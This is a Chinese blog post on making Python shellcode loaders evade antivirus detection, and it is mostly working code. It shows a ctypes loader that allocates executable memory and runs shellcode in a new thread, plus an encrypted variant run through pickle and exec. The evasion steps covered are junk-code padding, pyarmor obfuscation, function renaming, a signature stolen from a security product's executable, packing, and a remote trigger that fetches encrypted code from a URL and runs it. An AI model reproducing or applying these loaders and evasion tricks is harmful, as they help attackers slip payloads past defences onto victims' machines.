-
python免杀初探
loader基础知识
loader
import ctypes #(kali生成payload存放位置) shellcode = bytearray(b"shellcode") # 设置VirtualAlloc返回类型为ctypes.c_uint64 ctypes.windll.kernel32.VirtualAlloc.restype = ctypes.c_uint64 # 申请内存 ptr = ctypes.windll.kernel32.VirtualAlloc(ctypes.c_int(0), ctypes.c_int(len(shellcode)), ctypes.c_int(0x3000), ctypes.c_int(0x40)) # 放入shellcode buf = (ctypes.c_char * len(shellcode)).from_buffer(shellcode) ctypes.windll.kernel32.RtlMoveMemory( ctypes.c_uint64(ptr), buf, ctypes.c_int(len(shellcode)) ) # 创建一个线程从shellcode防止位置首地址开始执行 handle = ctypes.windll.kernel32.CreateThread( ctypes.c_int(0), ctypes.c_int(0), ctypes.c_uint64(ptr), ctypes.c_int(0), ctypes.c_int(0), ctypes.pointer(ctypes.c_int(0)) ) # 等待上面创建的线程运行完 ctypes.windll.kernel32.WaitForSingleObject(ctypes.c_int(handle),ctypes.c_int(-1))- 1
- 2
- 3
- 4
- 5
- 6
- 7
- 8
- 9
- 10
- 11
- 12
- 13
- 14
- 15
- 16
- 17
- 18
- 19
- 20
- 21
- 22
- 23
- 24
- 25
- 26
参数介绍
# virtualalloc: 申请虚拟内存 LPVOID VirtualAlloc( LPVOID lpAddress, // 指定要分配的区域的期望起始地址。一般为null SIZE_T dwSize, // 要分配的堆栈大小 DWORD flAllocationType, // 类型的分配 DWORD flProtect // 内存的执行权限 ); // 属性解释 flAllocationType: MEM_COMMIT: 在内存或磁盘上的分页文件中为指定的内存页区域分配物理存储。该函数将内存初始化为零。(提交到物理内存) MEM_REVERSE: 保留一定范围的进程虚拟地址空间,而不在内存或磁盘上的分页文件中分配任何实际物理存储。(保留虚拟内存) flProtect: PAGE_EXECUTE_READWRITE: 内存页分配为可读可写可执行 PAGE_READWRITE: 内存页分配为可读可写 #RtlMoveMemory: 将一个缓冲区的内容复制到另一个缓冲区。 VOID RtlMoveMemory( IN VOID UNALIGNED *Destination, // 要复制到的目标 IN CONST VOID UNALIGNED *Source, // 要转移的内存块 IN SIZE_T Length // 内存块大小 ); # CreateThread: 创建线程 HANDLE CreateThread( LPSECURITY_ATTRIBUTES lpThreadAttributes, // 安全属性,一般设置为0或者null SIZE_T dwStackSize, // 初始栈大小, 设置为0 LPTHREAD_START_ROUTINE lpStartAddress, // 线程函数地址 LPVOID lpParameter, // 线程参数,没传参即为0 DWORD dwCreationFlags, // 创建线程标志,对线程做控制的 LPDWORD lpThreadId // 线程id ); # WaitForSingleObject: 等待线程执行完毕 DWORD WaitForSingleObject( HANDLE hHandle, // 句柄 DWORD dwMilliseconds // 等待标志, 常用INFINITE, 即为无限等待线程执行完毕 );- 1
- 2
- 3
- 4
- 5
- 6
- 7
- 8
- 9
- 10
- 11
- 12
- 13
- 14
- 15
- 16
- 17
- 18
- 19
- 20
- 21
- 22
- 23
- 24
- 25
- 26
- 27
- 28
- 29
- 30
- 31
- 32
- 33
- 34
- 35
- 36
- 37
- 38
生成exe
pyinstaller -F -w a.py- 1
果然烂大街的代码生成的exe连静态都过不了
evilhiding项目地址
https://github.com/coleak2021/evilhiding.git- 1
不能免杀了可以提Issues,stars是持续更新的动力,嘻嘻嘻。
免杀方式
修改加载器
import pickle,base64,requests,ctypes from cryptography.fernet import Fernet url='' def doit(sectr): KEY={key2} fernet = Fernet(KEY) destr = fernet.decrypt(sectr).decode() class A(object): def __reduce__(self): return (exec, (destr,)) ret = pickle.dumps(A()) ret_base64 = base64.b64encode(ret) ret_decode = base64.b64decode(ret_base64) pickle.loads(ret_decode)- 1
- 2
- 3
- 4
- 5
- 6
- 7
- 8
- 9
- 10
- 11
- 12
- 13
- 14
- 15
- 16
import ctypes from cryptography.fernet import Fernet KEY={key} fernet=Fernet(KEY) shellcode=fernet.decrypt({enstr}) shellcode = bytearray(shellcode) ctypes.windll.kernel32.VirtualAlloc.restype = ctypes.c_uint64 ptr = ctypes.windll.kernel32.VirtualAlloc(ctypes.c_int(0), ctypes.c_int(len(shellcode)), ctypes.c_int(0x3000), ctypes.c_int(0x40)) buf = (ctypes.c_char * len(shellcode)).from_buffer(shellcode) ctypes.windll.kernel32.RtlMoveMemory( ctypes.c_uint64(ptr), buf, ctypes.c_int(len(shellcode)) ) handle = ctypes.windll.kernel32.CreateThread( ctypes.c_int(0), ctypes.c_int(0), ctypes.c_uint64(ptr), ctypes.c_int(0), ctypes.c_int(0), ctypes.pointer(ctypes.c_int(0)) ) ctypes.windll.kernel32.WaitForSingleObject(ctypes.c_int(handle),ctypes.c_int(-1))- 1
- 2
- 3
- 4
- 5
- 6
- 7
- 8
- 9
- 10
- 11
- 12
- 13
- 14
- 15
- 16
- 17
- 18
- 19
- 20
- 21
- 22
- 23
- 24
花指令
t1 =""" import random def partition(test_arr, low, high): i = (low - 1) pivot = test_arr[high] for j in range(low, high): if test_arr[j] <= pivot: i = i + 1 test_arr[i], test_arr[j] = test_arr[j], test_arr[i] test_arr[i + 1], test_arr[high] = test_arr[high], test_arr[i + 1] return i + 1 def quick_sort(test_arr, low, high): if low < high: pi = partition(test_arr, low, high) quick_sort(test_arr, low, pi - 1) quick_sort(test_arr, pi + 1, high) test_arr= [] for i in range(59999): test_arr.append(random.random()) n= len(test_arr) quick_sort(test_arr,0, n - 1) """ t2 =""" import re re.search('www','www.runoob.com').span() re.search('com','www.runoob.com').span() line= "Cats are smarter than dogs ok in shakdhaksdas"; searchObj= re.search(r'(.*) are (.*?) .*', line, re.M | re.I) def double(matched): value = int(matched.group('value')) return str(value * 2) s= 'A23G4HFD567' re.sub('(?P\d+)',double, s) """ t3 =""" import base64 st= 'wo gan jue wo ma shang jiu yao bei defender gan diao a ba a bachonogchong chongcong!'.encode() res= base64.b64encode(st) aaa= res.decode() res= base64.b64decode(res) bbb= res.decode() """ exec(t1) exec(t2) exec(t3)- 1
- 2
- 3
- 4
- 5
- 6
- 7
- 8
- 9
- 10
- 11
- 12
- 13
- 14
- 15
- 16
- 17
- 18
- 19
- 20
- 21
- 22
- 23
- 24
- 25
- 26
- 27
- 28
- 29
- 30
- 31
- 32
- 33
- 34
- 35
- 36
- 37
- 38
- 39
- 40
- 41
- 42
- 43
- 44
- 45
- 46
- 47
- 48
- 49
- 50
- 51
- 52
- 53
- 54
- 55
- 56
- 57
- 58
- 59
- 60
- 61
- 62
混淆loader源码
pyarmor gen a.pyhunxiao函数
def hunxiao(): openfile = 'b.py' text = open(openfile, encoding='utf-8').read() wd_df = re.findall("def (.*?)\\(", text) wd_df = list(set(wd_df)) for i in wd_df: if i[0:2] == "__": wd_df.remove(i) if i == 'super': wd_df.remove(i) idlist = [] for i in wd_df: idlist.append('O' + str(hash(i))[-7:]) cs = len(wd_df) if cs == len(set(idlist)): while cs > 0: cs -= 1 text = text.replace(wd_df[cs] + '(', idlist[cs] + '(') text = text.replace('target=' + wd_df[cs], 'target=' + idlist[cs]) text = text.replace('global ' + wd_df[cs], 'global ' + idlist[cs]) text = text.replace(', ' + wd_df[cs], ', ' + idlist[cs]) print('successful function:', wd_df, '\n', idlist) else: print('hash repeat') file_save = open('b.py', 'w', encoding='utf-8') file_save.write(text) file_save.close()- 1
- 2
- 3
- 4
- 5
- 6
- 7
- 8
- 9
- 10
- 11
- 12
- 13
- 14
- 15
- 16
- 17
- 18
- 19
- 20
- 21
- 22
- 23
- 24
- 25
- 26
- 27
- 28
- 29
修改签名
python sigthief.py -i D:\Huorong\Sysdiag\bin\HipsMain.exe -t HipsMain1.exe -o HipsMain.exe- 1
加壳
- vmpro
远程条件触发
def start(): try: r=requests.get(url) a = r.status_code except: a = 404 pass if a == 200: doit(r.text) else:- 1
- 2
- 3
- 4
- 5
- 6
- 7
- 8
- 9
- 10
- 11
修改ico的md5
iconame=f'{int (time.time() *1000)}.ico' with open('coleak.ico',"br") as f: cont=f.read() with open(f'{iconame}',"bw") as f: cont+=iconame.encode() f.write(cont) os.remove(iconame)- 1
- 2
- 3
- 4
- 5
- 6
- 7
- 8
加密
key = Fernet.generate_key() fernet = Fernet(key) enstr = fernet.encrypt(shellcode) key2 = Fernet.generate_key() fernet2 = Fernet(key2) with open('a.txt', 'bw') as f: f.write(fernet2.encrypt(a.encode()))- 1
- 2
- 3
- 4
- 5
- 6
- 7
- 8
- 9
-
相关阅读:
《操作系统-真象还原》06. 完善内核
计算机毕业设计Java网上投稿管理系统(源码+系统+mysql数据库+Lw文档)
云呐|动环监控设备维护与常见故障处理
计算机竞赛 机器学习股票大数据量化分析与预测系统 - python 计算机竞赛
Jmeter安装与测试
PMP_第8章章节试题
合取范式可满足性问题:CDCL(Conflict-Driven Clause Learning)算法详解
你觉得程序员最需要具备哪些软技能?
黑马程序员RabbitMQ入门到实战教程【高级篇】学习笔记
ESP8266-Arduino编程实例-LSM6DS3加速度计和陀螺仪驱动
- 原文地址:https://blog.csdn.net/qq_63701832/article/details/133968257
